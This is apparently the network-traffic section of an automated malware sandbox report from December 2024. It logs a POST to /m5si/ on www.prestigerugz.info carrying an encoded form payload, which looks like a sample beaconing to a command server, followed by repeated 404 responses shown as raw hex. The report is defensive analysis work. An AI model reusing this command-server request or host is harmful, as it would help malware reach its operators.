                Source: unknownHTTP traffic detected: POST /m5si/ HTTP/1.1Host: www.prestigerugz.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usAccept-Encoding: gzip, deflate, brContent-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheContent-Length: 221Origin: http://www.prestigerugz.infoReferer: http://www.prestigerugz.info/m5si/User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:31.0) Gecko/20100101 Firefox/31.0 K-Meleon/75.0Data Raw: 39 72 4b 48 6a 44 78 50 3d 54 6f 77 58 69 57 37 79 69 5a 61 49 2b 35 30 62 56 33 69 4b 49 77 73 5a 38 4e 54 4b 4c 6c 79 53 48 37 37 34 5a 4c 45 45 48 6e 4b 39 4a 31 36 50 50 6a 52 53 37 66 57 65 6c 7a 52 6c 48 58 49 54 70 71 37 69 72 6a 57 51 44 71 7a 4c 4e 49 36 61 6e 61 49 73 6c 6b 2f 37 38 7a 2f 50 74 76 54 79 79 63 52 67 70 6b 30 4b 73 55 35 59 38 78 75 36 7a 64 77 77 4c 76 6e 43 6d 34 32 79 63 4f 35 74 76 41 48 76 30 7a 71 66 32 69 33 37 63 75 31 39 48 72 55 43 4b 42 4f 4b 2b 69 61 35 7a 6d 44 67 7a 54 48 4d 46 74 32 32 33 67 74 58 57 64 67 30 6b 36 32 62 48 4a 32 59 76 77 4f 42 53 53 73 49 4e 4e 74 49 42 62 62 43 70 70 45 47 4d 77 7a 32 79 77 3d 3d Data Ascii: 9rKHjDxP=TowXiW7yiZaI+50bV3iKIwsZ8NTKLlySH774ZLEEHnK9J16PPjRS7fWelzRlHXITpq7irjWQDqzLNI6anaIslk/78z/PtvTyycRgpk0KsU5Y8xu6zdwwLvnCm42ycO5tvAHv0zqf2i37cu19HrUCKBOK+ia5zmDgzTHMFt223gtXWdg0k62bHJ2YvwOBSSsINNtIBbbCppEGMwz2yw==
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 11 Dec 2024 14:03:50 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 11 Dec 2024 14:03:52 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeDate: Wed, 11 Dec 2024 14:03:55 GMTServer: ApacheX-Frame-Options: denyContent-Encoding: gzipData Raw: 32 33 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 85 54 4d 6f d3 40 10 bd f7 57 4c 8d 50 40 c4 71 7a 43 89 dd 03 50 2a a0 d4 95 5a 84 90 b8 ac bd 63 7b 5a 7b 37 da 5d e7 03 c4 7f 67 bc 4e a4 84 b8 24 97 68 e7 e3 bd dd f7 66 1c 9f 7f 48 df 3f fc b8 bb 82 ca 35 f5 e5 59 dc ff 41 5c a1 90 97 67 00 71 83 4e 40 5e 09 63 d1 25 41 eb 8a f0 6d e0 13 d6 6d 6a 04 b7 59 60 12 38 5c bb 28 b7 d6 67 3c d4 18 32 2d 37 63 78 b1 10 c6 29 34 63 a0 c2 88 06 e1 37 83 1e fe 2a a4 b2 72 b3 8b e9 f4 e5 fc 28 b9 22 e9 aa 67 72 8d 30 25 a9 d9 f4 b8 6b 21 a4 24 55 0e a5 32 6d 24 9a a1 8c 6e 5d 4d 0a 87 52 85 56 2e b4 f4 0b 9f b9 c9 12 8d a3 5c d4 a1 a8 a9 54 b3 4c 58 ec a0 8e 2f 96 89 fc a9 34 ba 55 72 e6 8c 50 96 d5 41 e5 0e eb fe 1c 88 d0 c9 38 20 9a 66 ca a2 d6 ab 59 45 52 a2 3a 46 88 23 6f d0 9e 87 fc 06 e6 4a 82 db f4 7b 00 8a bd 48 02 5c 2f c8 60 6f db d6 e9 5d 15 29 89 eb 31 14 ba 66 96 31 88 ba de 35 5d a7 e9 f5 cd d5 bb f4 a1 9f 83 7e 40 4e b7 19 9d 69 b7 a5 3a 0f 43 f8 e8 91 d9 25 f8 ca 23 16 3e 88 12 0a 5a a3 05 cb 42 72 38 24 6b 5b 3e 6a 05 8d ce 88 67 4d e2 92 72 8e 84 e1 c0 ab fc a0 24 7d 49 e8 0f 73 20 45 8e d8 95 0e 11 93 8b c9 74 0e 8d 58 53 d3 36 fb a1 d6 a2 f1 67 91 71 d5 74 be 7b e7 92 70 b5 d0 c6 75 cf 8c a3 ed 42 c4 9d 1f 9e 5e d2 12 48 26 c1 76 c0 7b 31 22 8e fa ac cd 0d 2d dc fe 7a 3c 8a a5 e8 a3 fd 96 48 9d b7 0d 1b 32 59 19 72 f8 ea c0 f4 dd 82 8c e2 ff e2 40 2d 54 d9 8a 92 9d fc cc e8 f7 9e 33 18 0d 42 ed 20 df c0 c8 9a 3c 09 a2 c8 a2 d4 7c f9 27 d6 7a 92 eb 26 2a 4c d3 1d a3 53 fd 2b 1e 0d bd 9a d4 3a 17 8e b4 9a 54 da 3a 60 d8 93 8d a3 4f e9 6d 7a 7f d7 53 7e fb 72 8a 67 14 75 d7 99 3c f2 cc 0c 97 32 67 fc 33 ea 15 fa a7 e4 75 b7 10 bc 02 5e 11 ef 5f ef 1b fb d8 7d e7 fe 02 e4 39 6b fe f7 04 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 23aTMo@WLP@qzCP*Zc{Z{7]gN$hfH?5YA\gqN@^c%AmmjY`8\(g<2-7cx)4c7*r("gr0%k!$U2m$n]MRV.\TLX/4UrPA8 fYER:F#oJ{H\/`o])1f15]~@Ni:C%#>ZBr8$k[>jgMr$}Is EtXS6gqt{puB^H&v{1"-z<H2Yr@-T3B <|'z&*LS+:T:`OmzS~rgu<2g3u^_}9k0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 1271Connection: closeDate: Wed, 11 Dec 2024 14:03:58 GMTServer: ApacheX-Frame-Options: denyData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 68 74 6d 6c 2c 20 62 6f 64 79 2c 20 23 70 61 72 74 6e 65 72 2c 20 69 66 72 61 6d 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74 6c 69 6e 65 3a 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 62 61 73 65 6c 69 6e 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 74 72 61 6e 73 70 61 72 65 6e 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 57 22 20 6e 61 6d 65 3d 22 65 78 70 69 72 65 73 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 47 4f 4f 47 4c 45 42 4f 54 22 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 2c 20 61 6c 6c 22 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 3e 0a 20 20 3c 21 2d 2d 20 46 6f 6c 6c 6f 77 69 6e 67 20 4d 65 74 61 2d 54 61 67 20 66 69 78 65 73 20 73 63 61 6c 69 6e 67 2d 69 73 73 75 65 73 20 6f 6e 20 6d 6f 62 69 6c 65 20 64 65 76 69 63 65 73 20 2d 2d 3e 0a 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 3b 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 3b 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 3b 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 74 6e 65 72 22 3e 0a 20 20 3c 2f 64 69 76 3e 0a 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 27 3c 73 63 72 69 70 74 20 74 79 70 65 3d 2
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:29 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:32 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:35 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 11 Dec 2024 14:04:37 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66df0ead-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:10 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1238date: Wed, 11 Dec 2024 14:05:12 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 